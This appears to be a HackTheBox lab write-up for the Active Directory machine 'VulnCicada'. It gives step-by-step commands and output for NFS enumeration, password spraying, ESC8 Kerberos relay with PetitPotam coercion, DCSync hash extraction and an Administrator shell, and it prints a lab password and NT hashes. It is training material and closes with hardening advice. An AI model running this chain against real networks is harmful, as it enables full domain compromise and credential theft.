> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-vulncicada.md).

# HTB - VulnCicada

## NMAP

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-27 18:20:51Z)
111/tcp   open  rpcbind?
| rpcinfo: 
|   program version    port/proto  service
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100021  2,3,4       2049/tcp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-27T18:08:21
| Not valid after:  2027-05-27T18:08:21
| MD5:     9999 e204 9ddf 0852 af98 6cec 25dd 1991
| SHA-1:   3343 7141 3804 c9e3 cf35 cf02 ce8d ef09 4b9f 8011
|_SHA-256: 9a1f e659 3959 6cca 3c3d d099 3661 bde9 1584 3bb5 f732 6d5b fac1 5640 816e b5fb
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-27T18:08:21
| Not valid after:  2027-05-27T18:08:21
| MD5:     9999 e204 9ddf 0852 af98 6cec 25dd 1991
| SHA-1:   3343 7141 3804 c9e3 cf35 cf02 ce8d ef09 4b9f 8011
|_SHA-256: 9a1f e659 3959 6cca 3c3d d099 3661 bde9 1584 3bb5 f732 6d5b fac1 5640 816e b5fb
2049/tcp  open  status        1 (RPC #100024)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-27T18:08:21
| Not valid after:  2027-05-27T18:08:21
| MD5:     9999 e204 9ddf 0852 af98 6cec 25dd 1991
| SHA-1:   3343 7141 3804 c9e3 cf35 cf02 ce8d ef09 4b9f 8011
|_SHA-256: 9a1f e659 3959 6cca 3c3d d099 3661 bde9 1584 3bb5 f732 6d5b fac1 5640 816e b5fb
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-05-27T18:22:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Issuer: commonName=DC-JPQ225.cicada.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-26T18:15:56
| Not valid after:  2026-11-25T18:15:56
| MD5:     5b8c e3ce a858 9e96 ebca 1876 6b43 b267
| SHA-1:   2f2e 7e82 a361 c296 0a30 57a1 4a49 2439 5ae1 1440
|_SHA-256: 8f9b b689 797d 2d22 7bda e84d 86a0 a250 4a59 769b 2c25 cc94 35dd ed15 6ca3 373a
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
54519/tcp open  msrpc         Microsoft Windows RPC
55045/tcp open  msrpc         Microsoft Windows RPC
62428/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
62429/tcp open  msrpc         Microsoft Windows RPC
62444/tcp open  msrpc         Microsoft Windows RPC
```

## Initial Enumeration

No DNS Zone Transfer

No LDAP Anonymous Bind.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsHPIFTBWb2M1bJ80ueDS%2Fimage.png?alt=media&amp;token=33141a3e-e768-4874-9862-a0d05d53b990" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHJPHAPkygTOWDO56hY2q%2Fimage.png?alt=media&amp;token=454b7e26-d3ba-4da3-be37-b87e58d021b5" alt=""><figcaption></figcaption></figure>

### NFS

Found an nfs share called profiles, upon enumerating it found directories with user name. Inorder to better enumerate the host i have mounted it to my machine.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ showmount -e 10.129.234.48
Export list for 10.129.234.48:
/profiles (everyone)          
┌──(ajay㉿kali)-[~/Downloads]
└─$ sudo mkdir /mnt/cicada    
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/Downloads]
└─$ sudo mount -t nfs 10.129.234.48:/profiles /mnt/cicada -o nolock           // Some code
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4w9Ed8lBfgHpuzLPuJ6v%2Fimage.png?alt=media&amp;token=5572f21f-1495-42df-a352-1fd98aff8b3e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo3eukrfjufs7BUVo0ycG%2Fimage.png?alt=media&amp;token=2e1d6085-573e-4da7-a7f4-3ccec457dd72" alt=""><figcaption></figcaption></figure>

Found two png files vacation and marketing.

Opening the marketing file leaked a password `Cicada123`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQTJe6zGsGDDuXl5YY8YK%2Fimage.png?alt=media&amp;token=27d51191-14e2-4972-9421-d397432f0758" alt=""><figcaption></figcaption></figure>

With the usernames as directories, extracted them to a directory and password sprayed with the password using nxc.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FphKtuUzbZjPSQu7wH1LU%2Fimage.png?alt=media&amp;token=d91a8d25-d311-4ced-b397-84ab713fc03b" alt=""><figcaption></figcaption></figure>

NTLM is Disabled on machine, lets use kerberos to login.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmdQwLddk1CRwmgKE7vu7%2Fimage.png?alt=media&amp;token=6ec9b723-0fac-47ae-9e36-11bc036ab470" alt=""><figcaption></figcaption></figure>

Found a successful hit with the creds `Rosie.Powell:Cicada123`

## Credentialized Enumeration

### SMB

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbC27Y9IlHrBO0q2nuyPr%2Fimage.png?alt=media&amp;token=ae8ad9bc-63f3-41b1-848c-b86a6a47c0bc" alt=""><figcaption></figcaption></figure>

Enumerating the SMB shares as Rosie leaked a uncommon share `CertEnroll` and also `profile$` has `READ,WRITE` permissisons.

#### Accessing shares with kerberos

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmTeuP3PPYaxQKyqlAcfb%2Fimage.png?alt=media&amp;token=b488c5ad-c672-49cf-80c1-9e52da4b2c27" alt=""><figcaption></figcaption></figure>

There are certificate templates in shares which suggests there can be vulnerable templates to exploit.

To enumerate them we can run certipy using the creds.

#### Certipy to Enumerate Vulnerable Templates

Lets a get a TGT for Rosie first.

```bash
┌──(ajay㉿kali)-[~]
└─$ # Step 1: Get TGT explicitly
impacket-getTGT cicada.vl/Rosie.Powell:Cicada123 -dc-ip 10.129.234.48
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Rosie.Powell.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ # Step 2: Check it was created
ls -la Rosie.Powell.ccache
-rw-rw-r-- 1 ajay ajay 1431 May 27 15:27 Rosie.Powell.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=$(pwd)/Rosie.Powell.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ klist
Ticket cache: FILE:/home/ajay/Rosie.Powell.ccache
Default principal: Rosie.Powell@CICADA.VL

Valid starting       Expires              Service principal
05/27/2026 15:27:56  05/28/2026 01:27:56  krbtgt/CICADA.VL@CICADA.VL
        renew until 05/28/2026 15:27:56

```

```bash
# Step 4: Run certipy with target specified
certipy find -u 'Rosie.Powell@cicada.vl' -k -no-pass -target DC-JPQ225.cicada.vl -dc-ip 10.129.234.48 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'
[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 5944EBFD4CE7CAAF4C9E20BC1A841A8F
    Certificate Validity Start          : 2026-05-27 18:11:58+00:00
    Certificate Validity End            : 2526-05-27 18:21:58+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled over HTTP.
Certificate Templates                   : [!] Could not find any certificate templates
```

There we go found an ESC8 vulnerable template.

## Exploiting ESC8

`ESC8` means the Active Directory Certificate Services (AD CS) web enrollment portal is running over unencrypted HTTP, and it is vulnerable to **NTLM Relay attacks**.

Normally, you would use a tool like `ntlmrelayx` to capture an incoming NTLM authentication from a high-privilege machine (like another server or a Domain Controller), relay it to this HTTP web enrollment endpoint, and request a Domain Admin certificate in their name.

We know that **`NTLM:False`** is explicitly configured on this Domain Controller. If NTLM is completely disabled system-wide, an NTLM relay attack cannot be triggered traditionally because machines won't authenticate via NTLM.

According to the Certipy output, we can see that Web Enrollment is enabled in HTTP on the AD CS.

Let's try the full krbrelayx Kerberos relay approach since NTLM is completely disabled:

### Kerberos Relay Attack

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkwItVoIv8QzEvZnjFftw%2Fimage.png?alt=media&amp;token=84c020e9-fdc2-4ba3-9e0d-f5236ddf56b1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F70jvfaM9JHUAJ96JWAhR%2Fimage.png?alt=media&amp;token=c86526e8-65aa-4dec-961f-c9f2dba04df1" alt=""><figcaption></figcaption></figure>

Kerberos relay requires the DC to authenticate back to our listener. We register a DNS record pointing to our attack machine using BloodyAD:

Huge thanks to **`0xdf`** for explaining it clearly.

The hostname `DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` includes an empty `CREDENTIAL_TARGET_INFORMATION` structure, which instructs the authenticating host to use Kerberos.

```bash

┌──(ajay㉿kali)-[~]
└─$ bloodyAD -u 'Rosie.Powell' -p 'Cicada123' -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord 'DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.17
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added

```

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] (SMB): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] (SMB): Authenticating connection from /@10.129.234.48 against http://dc-jpq225.cicada.vl SUCCEED [1]
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] (SMB): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] http:///@dc-jpq225.cicada.vl [1] -> HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 88
[*] Retrieving certificate for request ID: 88
[*] http:///@dc-jpq225.cicada.vl [1] -> HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=88 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...

```

```bash
└─$ nxc smb DC-JPQ225.cicada.vl  -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [*]  x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\Rosie.Powell:Cicada123 
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        Exploit Success, efsrpc\EfsRpcAddUsersToFile
```

Using `nxc` with the `coerce_plus` module, the DC is forced to authenticate to our malicious DNS record. The relay succeeds and Certipy captures a certificate for the DC machine account.

With the certificate I can authenticate as the computer account:

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*]     Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3

```

Both a TGT and the NT hash for the DC machine account are returned.

With the DC machine account's TGT, a DCSync can be performed to extract the Administrator NTLM hash:

```bash
export KRB5CCNAME=dc-jpq225.ccache
impacket-secretsdump -k -no-pass 'cicada.vl/DC-JPQ225$@DC-JPQ225.cicada.vl'
```

Administrator hash recovered: 85a0da53871a9d56b6cd05deda3a5e87

## Shell as Administrator

NTLM is disabled everywhere so we  need to use Kerberos to get the shell.

```bash
                                                                                                                                                                                                                                         
┌──(ajay㉿kali)-[~]
└─$ impacket-getTGT cicada.vl/Administrator -hashes 'aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87' -dc-ip 10.129.234.48
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache
                                                                                                                                                                                                                                         
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/home/ajay/Administrator.ccache
                                                                                                                                                                                                                                         
┌──(ajay㉿kali)-[~]
└─$ klist
Ticket cache: FILE:/home/ajay/Administrator.ccache
Default principal: Administrator@CICADA.VL

Valid starting       Expires              Service principal
05/27/2026 16:20:37  05/28/2026 02:20:37  krbtgt/CICADA.VL@CICADA.VL
        renew until 05/28/2026 16:20:37
```

```bash
──(ajay㉿kali)-[~]
└─$ # wmiexec with Kerberos
impacket-wmiexec -k -no-pass 'cicada.vl/Administrator@DC-JPQ225.cicada.vl'
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
cicada\administrator

```

## Key Takeaways

* **Disabling NTLM is not a silver bullet.** ESC8 remains exploitable via Kerberos relay when the coercion target can authenticate with Kerberos.
* **NFS exports deserve the same scrutiny as SMB shares.** World-readable profile shares are a common credential leakage vector.
* **Kerberos relay (krbrelayx / certipy relay) fills the gap** when NTLM is disabled — coerced Kerberos authentication can still be relayed to HTTP endpoints.
* **AD CS hardening checklist:** disable HTTP web enrollment, enforce HTTPS, enable Extended Protection for Authentication (EPA), and audit certificate templates regularly.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-vulncicada.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
